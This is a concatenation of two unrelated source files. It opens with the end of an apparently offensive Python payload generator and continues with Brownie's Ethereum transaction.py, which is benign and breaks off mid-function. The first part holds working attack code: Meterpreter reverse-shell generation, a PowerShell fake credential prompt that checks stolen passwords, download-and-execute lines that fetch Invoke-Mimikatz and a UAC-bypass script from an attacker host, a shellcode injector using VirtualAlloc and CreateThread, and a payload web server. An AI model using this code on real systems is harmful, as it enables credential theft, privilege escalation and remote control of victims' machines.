return msfvenomGeneration('windows/meterpreter/reverse_https', ip, port)
@staticmethod
def windows_met_rev_shell_dns(ip, port):
return msfvenomGeneration('windows/meterpreter/reverse_tcp_dns', ip, port)
@staticmethod
def windows_custom_shellcode():
customshell = ''
print 'Paste custom shellcode below\nType \'END\' when done.'
while True:
buildstr = raw_input().rstrip()
if buildstr == 'END':
break
else:
customshell += buildstr
return customshell
@staticmethod
def windows_ps_ask_creds_tcp():
return (
"$ErrorActionPreference=\'SilentlyContinue\';Add-Type -assemblyname system.DirectoryServices.accountmanagement;"
"$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine);"
"$domainDN = \'LDAP://\' + ([ADSI]\'\').distinguishedName;"
"$credential = $host.ui.PromptForCredential(\'Credentials are required to perform this operation!\', \'\', \'\', \'\');"
"if($credential){$creds = $credential.GetNetworkCredential();$user = $creds.username;$pass = $creds.password;"
"echo \' INCORRECT:\'$user\':\'$pass;"
"$authlocal = $DS.ValidateCredentials($user, $pass);"
"$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass);"
"if(($authlocal -eq $true) -or ($authdomain.name -ne $null)){"
"echo \' CORRECT:\'$user\':\'$pass}}")
@staticmethod
def windows_invoke_mimikatz():
return (
"IEX (New-Object Net.WebClient).DownloadString(\\\"http://%s:%s/Invoke-Mimikatz.ps1\\\");"
"Invoke-Mimikatz -DumpCreds")
@staticmethod
def windows_uac_bypass():
return (
"IEX (New-Object Net.WebClient).DownloadString(\\\"http://%s:%s/Invoke-SilentCleanUpBypass.ps1\\\");"
"Invoke-SilentCleanUpBypass -Command \\\"powershell.exe -c %s\\\"")
injectwindows = """
shellcode = bytearray('%s')
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
bufe = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),bufe,ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
"""
class FUNCTIONS(object):
def powershellShellcodeLayout(self,powershellExec):
powershellShellcode = re.sub(r'\\x', '0x', powershellExec)
count = 0
newpayloadlayout = ''
for char in powershellShellcode:
count += 1
newpayloadlayout += char
if count == 4:
newpayloadlayout += ','
count = 0
return newpayloadlayout
def ServePayload(self, payloaddirectory, IP, port):
try:
os.chdir(payloaddirectory)
httpd = SocketServer.TCPServer((IP, port), HANDLER)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except:
print t.bold_red + '\n[*] Port in use' + t.normal
def DoServe(self, IP, payloadname, payloaddir, port, printIt):
if printIt:
print t.bold_green + "\n[*] Serving Payload On http://%s:%s/%s.exe" % (IP, port, payloadname) + t.normal
a = multiprocessing.Process(
target=self.ServePayload, args=(payloaddir, IP, port))
a.daemon = True
a.start()
def randomUnusedPort(self):
from menu import returnIP
s = socket.socket()
s.bind((returnIP(), 0))
port = s.getsockname()[1]
s.close()
return port
def stagePowershellCode(self, powershellFileContents, port):
from menu import returnIP
DIR = 'stager'
if not os.path.isdir(DIR):
os.mkdir(DIR)
os.chdir(DIR)
with open('stage.ps1','w') as psFile:
psFile.write(powershellFileContents)
httpd = SocketServer.TCPServer((returnIP(), port), HANDLER)
httpd.handle_request()
os.chdir('..')
import shutil
shutil.rmtree(DIR)
class Spinner(object):
def __init__(self,text):
self.spinner = [
["|", "\\", "-", "/"],
["▁","▃","▄","▅","▆","▇","█","▇","▆","▅","▄","▃"],
["◡◡", "⊙⊙", "◠◠"],
["◐","◓","◑","◒"],
["▉","▊","▋","▌","▍","▎","▏","▎","▍","▌","▋","▊","▉"],
[".","o","O","@","*"],
["◴","◷","◶","◵"],
["▖","▘","▝","▗"],
["←","↖","↑","↗","→","↘","↓","↙"],
["█▒▒▒▒▒▒","██▒▒▒▒▒","███▒▒▒▒","████▒▒▒","█████▒▒","██████▒","███████"],
["◢","◣","◤","◥"],
["( ● )", "( ● )", "( ● )", "( ● )", "( ●)", "( ● )", "( ● )", "( ● )", "( ● )", "(● )"]
]
self.loading = list(text)
self.randomchoice = random.choice(self.spinner)
self.spin_1 = len(self.randomchoice)
self.spin_2 = len(self.loading) + 1
self.x = 0
def Looper(self, text):
print t.bold_green,
sys.stdout.write('\r')
sys.stdout.write(text)
print t.normal,
sys.stdout.flush()
def Update(self):
self.spin_2mod = self.x % self.spin_2
self.Looper(self.randomchoice[self.x % self.spin_1] + " " + "".join(
self.loading[0: (self.spin_2mod)]) + (" " * (self.spin_2 - self.spin_2mod)))
self.x += 1
|
transaction.py
|
#!/usr/bin/python3
import functools
import sys
import threading
import time
from collections import OrderedDict
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import RPCRequestError
from brownie.project import build
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import _decode_logs, _decode_trace
from .web3 import web3
def trace_property(fn: Callable) -> Any:
# attributes that are only available after querying the tranasaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status == -1:
return None
if self._trace_exc is not None:
raise self._trace_exc
return fn(self)
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
revert_msg: Error string from reverted contract all
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs = None
nonce = None
sender = None
txid = None
txindex = None
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"Transaction sent: {color('bright blue')}{txid}{color}")
# internal attributes
self._trace_exc = None
self._trace_origin = None
self._raw_trace = None
self._trace = None
self._call_cost = 0
self._events = None
self._return_value = None
self._revert_msg = None
self._modified_state = None
self._new_contracts = None
self._internal_transfers = None
self._subcalls: Optional[List[Dict]] = None
self._confirmed = threading.Event()
# attributes that can be set immediately
self.sender = sender
self.status = -1
self.txid = txid
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
self._await_transaction(required_confs)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
def __repr__(self) -> str:
c = {-1: "bright yellow", 0: "bright red", 1: None}
return f"<Transaction '{color(c[self.status])}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[List]:
if not self.status:
self._get_trace()
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
return self._subcalls
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status == -1:
return None
return web3.eth.getBlock(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.blockNumber - self.block_number + 1
def wait(self, required_confs: int) -> None:
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.getTransaction(self.txid)
break
except TransactionNotFound:
time.sleep(0.5)
self._await_confirmation(tx, required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if self._revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
raise exc._with_attr(source=source, revert_msg=self._revert_msg)
def _await_transaction(self, required_confs: int = 1) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.getTransaction(self.txid)
break
except TransactionNotFound:
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
time.sleep(0.5)
self._set_from_tx(tx)
if not self._silent:
print(
f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
f" Gas limit: {color('bright blue')}{self.gas_limit}{color}"
)
# await confirmation of tx in a separate thread which is blocking if required_confs > 0
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx, required_confs), daemon=True
)
confirm_thread.start()
if required_confs > 0:
confirm_thread.join()
def _await_confirmation(self, tx: Dict, required_confs: int = 1) -> None:
if not tx["blockNumber"] and not self._silent and required_confs > 0:
if required_confs == 1:
print("Waiting for confirmation...")
else:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}0/"
f"{required_confs}{color}"
)
sys.stdout.flush()
# await first confirmation
receipt = web3.eth.waitForTransactionReceipt(self.txid, timeout=None, poll_latency=0.5)
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.getTransactionReceipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.getTransaction(self.txid)
self.block_number = None
return self._await_confirmation(tx, required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
self._confirmed.set()
if not self._silent and required_confs > 0:
print(self._confirm_output())
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
# if receiver is a known contract, set function name
if not self.fn_name and state._find_contract(tx["to"]) is not None:
contract = state._find_contract(tx["to"])
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = receipt["status"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{self.status}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.status:
self._events = _decode_logs(receipt["logs"])
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"])
def _confirm_output(self) -> str:
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color}) "
result = (
f" {self._full_name()} confirmed {status}- "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "debug_traceTransaction. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the skip_coverage fixture to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
# get events from trace
self._events = _decode_trace(trace, str(self.receiver or self.contract_address))
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
if self._revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)[4:]
self._revert_msg = decode_abi(["string"], data)[0]
return
if self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
return
# check for dev revert string using program counter
self._revert_msg = build._get_dev_revert(step["pc"])
if self._revert_msg is not None:
return
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
pc_map = state._find_contract(step["address"])._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
i = trace.index(step) - 4
if trace[i]["pc"] != step["pc"] - 4:
step = trace[i]
self._revert_msg = pc_map[step["pc"]]["dev"]
return
except (KeyError, AttributeError):
pass
step = next(i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID"))
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._trace is not None:
return
if self._raw_trace is None:
self._get_trace()
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if "fn" in trace[0]:
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
if trace[i]["depth"] > trace[i - 1]["depth"]:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
self._subcalls[-1].update(
inputs={i[0]["name"]: i[1] for i in zip_}, # type:ignore
function=fn._input_sig,
)
elif calldata:
self._subcalls[-1]["calldata"] = calldata
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
if not last["pc_map"]:
continue
pc = last["pc_map"][trace[i]["pc"]]
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
data = _get_memory(trace[i], -1)
subcall["return_value"] = None
if data:
fn = last["function"]
return_values = fn.decode_output(data)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)[4:]
if data:
subcall["revert_msg"] = decode_abi(["string"], data)[0]
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
result = (
f"Transaction was Mined {status}\n---------------------\n"
f"Tx Hash: {color('bright blue')}{self.txid}\n"
f"From: {color('bright blue')}{self.sender}\n"
)
if self.contract_address and self.status:
result += (
f"New {self.contract_name} address: {color('bright blue')}{self.contract_address}\n"
)
else:
result += (
f"To: {color('bright blue')}{self.receiver}{color}\n"
f"Value: {color('bright blue')}{self.value}\n"
)
if self.input != "0x" and int(self.input, 16):
result += f"Function: {color('bright blue')}{self._full_name()}\n"
result += (
f"Block: {color('bright blue')}{self.block_number}{color}\nGas Used: "
f"{color('bright blue')}{self.gas_used}{color} / {color('bright blue')}{self.gas_limit}"
f"{color} ({color('bright blue')}{self.gas_used / self.gas_limit:.1%}{color})\n"
)
if self.events:
result += "\n Events In This Transaction\n --------------------------"
for event in self.events: # type: ignore
result += f"\n {color('bright yellow')}{event.name}{color}" # type: ignore
for key, value in event.items(): # type: ignore
result += f"\n {key}: {color('bright blue')}{value}{color}"
print(result)
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: OrderedDict = OrderedDict({key: OrderedDict()})
active_tree = [call_tree[key]]
# (index, depth, jumpDepth) for relevent steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
# returning from an external call, return tree by jumpDepth of the previous depth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1][key] = OrderedDict()
active_tree.append(active_tree[-1][key])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
result = [next(i for i in trace_range if trace[i]["source"])]
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
